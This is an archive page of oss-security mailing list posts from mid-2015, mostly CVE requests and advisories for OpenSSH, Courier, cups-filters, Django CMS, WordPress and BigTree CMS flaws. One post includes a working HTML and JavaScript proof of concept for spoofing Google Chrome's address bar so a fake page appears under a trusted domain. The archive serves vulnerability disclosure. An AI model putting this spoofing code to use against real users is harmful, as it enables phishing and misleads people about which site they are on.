Andreas Stieger | 1 Jul 14:27 2015
Picon

CVE Request: two security issues in openSSH 6.9

Hi,

The openSSH 6.9 release contains the following changes declared as
security issues:

http://www.openssh.com/txt/release-6.9

> Security
> --------
>
>  * ssh(1): when forwarding X11 connections with ForwardX11Trusted=no,
>    connections made after ForwardX11Timeout expired could be permitted
>    and no longer subject to XSECURITY restrictions because of an
>    ineffective timeout check in ssh(1) coupled with "fail open"
>    behaviour in the X11 server when clients attempted connections with
>    expired credentials. This problem was reported by Jann Horn.

In the portable releases, this is 
https://anongit.mindrot.org/openssh.git/commit/?h=V_6_9&id=1bf477d3cdf1a864646d59820878783d42357a1d

>  * ssh-agent(1): fix weakness of agent locking (ssh-add -x) to
>    password guessing by implementing an increasing failure delay,
>    storing a salted hash of the password rather than the password
>    itself and using a timing-safe comparison function for verifying
>    unlock attempts. This problem was reported by Ryan Castellucci.

In the portable releases, this is
https://anongit.mindrot.org/openssh.git/commit/?h=V_6_9&id=9173d0fbe44de7ebcad8a15618e13a8b8d78902e

Could CVE-IDs be assigned for these please?
(Continue reading)

Picon

CVE request: persistent XSS in Wordpress Plugin NewStatPress v.1.0.3

OpenWallInfo
============
Created Tuesday 30 June 2015

Dear Sir or Mam,

we want to inform you about a security vulnerability in one of the
plugins provided by you or one member of your company.
Please regard the information below.

Plugin:
NewStatPress (https://wordpress.org/plugins/newstatpress/)

Product-Type:
Wordpress-Plugin

Version:
1.0.3

Vendor:         
ice00 (http://newstatpress.altervista.org/?page_id=2)

Fixed:             
reported: 2015-06-30
fixed in version 1.04, 2015-06-30

Changelog:         
https://wordpress.org/plugins/newstatpress/changelog/

Type of vulnerability:
(Continue reading)

Garth Mollett | 1 Jul 00:24 2015
Picon

Reject CVE-2015-3157

Please reject CVE-2015-3157. This was a private assignment to openstack
-trove due to a misunderstanding of the scope of a password exposure.

Thanks. 

--

-- 
Garth Mollett / Red Hat Product Security

Salvatore Bonaccorso | 30 Jun 20:50 2015
Picon

CVE Request: UDP checksum DoS

Hi

AFAICS there wasn't a CVE requested for the following:

https://twitter.com/grsecurity/status/605854034260426753

> remote DoS via flood of UDP packets with invalid checksums

It has been fixed in v4.1-rc7:

https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=beb39db59d14990e401e235faf66a6b9b31240b0

Could you assign a CVE for this issue?

Thanks in advance,

Regards,
Salvatore

David Leo | 30 Jun 08:08 2015
Picon

Google Chrome Address Spoofing (Request For Comment)

Impact:
The "click to verify" thing is completely broken...
Anyone can be "BBB Accredited Business" etc.
You can make whitehouse.gov display "We love Islamic State" :-)

Note:
No user interaction on the fake page.

Code:
***** index.html
<script>
function next()
{
	w.location.replace('http://www.oracle.com/index.html?'+n);n++;
	setTimeout("next();",15);
	setTimeout("next();",25);
}
function f()
{
	w=window.open("content.html","_blank","width=500 height=500");
	i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
}
</script>
<a href="#" onclick="f()">Go</a><br>
***** content.html
<b>This web page is NOT oracle.com</b>
<script>location="http://www.oracle.com/index.html";</script>
***** It's online
http://www.deusen.co.uk/items/gwhere.6128645971389012/
(The page says "June/16/2015" - it works as we tested today)
(Continue reading)

Kurt Seifried | 30 Jun 07:11 2015
Picon

Question about world readable config files and commented warnings

So, if a config file is world readable by default, but the section where
you might put a password says:

########
# Database URI for the database that stores the package information. If it
# contains a password, make sure to adjust the permissions of the config
########

Is that good enough, e.g. no CVE, or do we actually need to have proper
permissions?

I'm thinking we need proper permissions and not a note (especially with
administration tools/etc that may parse/modify the file but not change
the perms). Thoughts/comments/final decision from Mitre is welcome.

--

-- 
Kurt Seifried -- Red Hat -- Product Security -- Cloud
PGP A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Red Hat Product Security contact: secalert@...

David Jorm | 30 Jun 01:04 2015
Picon

OpenDaylight security advisory: CVE-2015-3414 CVE-2015-3416 SQLite memory corruption, CVE-2015-4000 LOGJAM TLS MITM

Hi All

OpenDaylight Lithium GA has now been released, including patches for
several security vulnerabilities:

[Moderate] CVE-2015-3414 CVE-2015-3416 AAA: SQLite memory corruption
leading to DoS and possible code execution

[Moderate] CVE-2015-4000 OpenDaylight: TLS connections which support export
grade DHE key-exchange are vulnerable to MITM attacks (LOGJAM)

Full details, including links to patched builds, are available on the
OpenDaylight security advisories page:

https://wiki.opendaylight.org/view/Security_Advisories
Thanks
David Jorm on behalf of the OpenDaylight security response team
Hanno Böck | 29 Jun 11:24 2015
Picon

Courier mail server: Write heap overflow in mailbot tool and out of bounds heap read in imap folder parser

https://blog.fuzzing-project.org/17-Courier-mail-server-Write-heap-overflow-in-mailbot-tool-and-out-of-bounds-heap-read-in-imap-folder-parser.html

Two memory access issues were found in the Courier mail server. These
issues were discovered by compiling the software with Address Sanitizer
(-fsanitize=address) and running the test suite.

In the file mailboxlist.c, part of the IMAP folder parser, there is a
memcmp call checking whether the fist six bytes of a string match
"SHARED". However the string can be less than six bytes, which will
cause an out of bounds read access. This issue is unlikely to cause
much trouble.

In the mailbot tool (mailbot.c) there is a memory allocation for a
zero-terminated list of pointers. The allocation only reserves one byte
for the zero termination, however it must be the size of the pointer (8
bytes on 64 bit systems). Therefore it causes a write heap overflow of
seven zero bytes. The code parses command line data, therefore it is
unlikely that any attacker controlled input is affected.

Both issues have been reported to Courier's developer Sam Varshavchik
on 27th June 2015 and were fixed with the release of courier 0.75 on
29th June 2015.

Commit / Patch (bundles some unrelated changes, the relevant parts are
in mailbot.c and mailboxlist.c)
https://github.com/svarshavchik/courier-libs/commit/174541a2e670c0ee70fd2fb3116209f96ecc173e

Courier 0.75 release announcement
http://sourceforge.net/p/courier/mailman/message/34249147/

(Continue reading)

Matthew Wilkes | 28 Jun 01:23 2015
Picon

CVE Request: Django CMS

Hi,

Can a CVE be assigned to this issue, please?

     http://www.django-cms.org/en/blog/2015/06/27/311-3014-release/

It's a CSRF issue around publishing of draft changes in Django CMS. 
Versions affected are Django CMS <3.0.14 and <3.1.1. I haven't verified 
its presence in Django CMS <3.0, I'm afraid.

The relevant commit is:

 
https://github.com/divio/django-cms/commit/f77cbc607d6e2a62e63287d37ad320109a2cc78a

The vendor credits with the discovery:
  * Sylvain Fankhauser of L//P
  * Matthew Wilkes of The Code Distillery

Thanks, let me know if you'd like more information.

Matt

Anirudh Anand | 26 Jun 19:00 2015
Picon

CVE Request - BigTree CMS - Stored XSS while creating a new user

Hello all,

BigTree CMS is a popular Content Management System written in PHP. While
creating a new user, the "*Name*" and "*Company*" parameters are not
properly sanitized and it leads to stored XSS.

*Date:* 25th June, 2015

*Exploit Author:* Anirudh Anand

*Vendor Homepage*: https://www.bigtreecms.org/

*Software Link:* https://www.bigtreecms.org/download/

*Version: *< 4.2.2

*Tested on:* Linux:- Ubuntu, Debian

The issue has been successfully reported to vendor and they have released
an update for the same.

*References: *

*Bug Report:* https://github.com/bigtreecms/BigTree-CMS/issues/205

*Fix Released:*
https://github.com/bigtreecms/BigTree-CMS/commit/e13aa4795cdeb1ab1dc0f5fd0b66df2d1296591d

--

-- 

(Continue reading)

Stefan Cornelius | 26 Jun 18:43 2015
Picon

CVE-2015-3258 cups-filters: texttopdf heap-based buffer overflow

Hi,

A heap-based buffer overflow was discovered in the way the texttopdf
utility of cups-filters processed print jobs with a specially crafted
line size. An attacker being able to submit print jobs could exploit
this flaw to crash texttopdf or, possibly, execute arbitrary code.

This was discovered by Petr Sklenar of Red Hat.

This is fixed in cups-filters 1.0.70.

Patch:
http://bzr.linuxfoundation.org/loggerhead/openprinting/cups-filters/revision/7363

Minor note on the side: The commit thanks me for the patch. The patch
was created by Tim Waugh of Red Hat, I've merely forwarded it.

Red Hat bug:
https://bugzilla.redhat.com/show_bug.cgi?id=1235385

Thanks,
--

-- 
Stefan Cornelius / Red Hat Product Security


Gmane